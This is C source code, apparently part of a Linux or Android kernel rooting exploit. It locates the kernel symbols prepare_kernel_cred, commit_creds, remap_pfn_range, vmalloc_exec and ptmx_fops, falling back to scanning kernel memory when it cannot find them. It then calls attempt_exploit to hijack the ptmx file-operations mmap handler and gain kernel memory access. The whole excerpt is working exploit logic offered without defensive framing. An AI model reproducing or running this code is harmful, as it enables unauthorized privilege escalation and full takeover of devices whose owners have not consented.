static bool
setup_variables(void)
{
setup_prepare_kernel_cred_address();
setup_commit_creds_address();
setup_remap_pfn_range_address();
setup_vmalloc_exec_address();
setup_ptmx_fops_address();
if (has_all_essential_addresses()) {
return true;
}
printf("Try to find address in memory...\n");
if (!run_with_mmap(find_variables_in_memory)) {
printf("\n");
run_with_memcpy(find_variables_in_memory);
}
if (has_all_essential_addresses()) {
return true;
}
if (!prepare_kernel_cred) {
printf("Failed to get prepare_kernel_cred address.\n");
}
if (!commit_creds) {
printf("Failed to get commit_creds address.\n");
}
if (!remap_pfn_range) {
printf("Failed to get remap_pfn_range address.\n");
}
if (!vmalloc_exec) {
printf("Failed to get vmalloc_exec address.\n");
}
if (!ptmx_fops) {
printf("Failed to get ptmx_fops address.\n");
}
return false;
}
bool
run_with_mmap(memory_callback_t callback)
{
unsigned long int kernel_physical_offset;
bool result;
if (run_exploit_mmap(callback, &result)) {
return result;
}
setup_remap_pfn_range_address();
if (!remap_pfn_range) {
printf("You need to manage to get remap_pfn_range addresses.\n");
return false;
}
setup_ptmx_fops_mmap_address();
if (!ptmx_fops_mmap_address) {
printf("You need to manage to get ptmx_fops addresses.\n");
return false;
}
kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset));
if (kernel_physical_offset) {
set_kernel_phys_offset(kernel_physical_offset - 0x00008000);
}
else if (!detect_kernel_phys_parameters()) {
printf("You need to manage to get kernel_physical_offset addresses.\n");
return false;
}
return attempt_exploit(ptmx_fops_mmap_address,
(unsigned long int)&ptmx_mmap, 0,
run_callback_with_mmap, callback);
}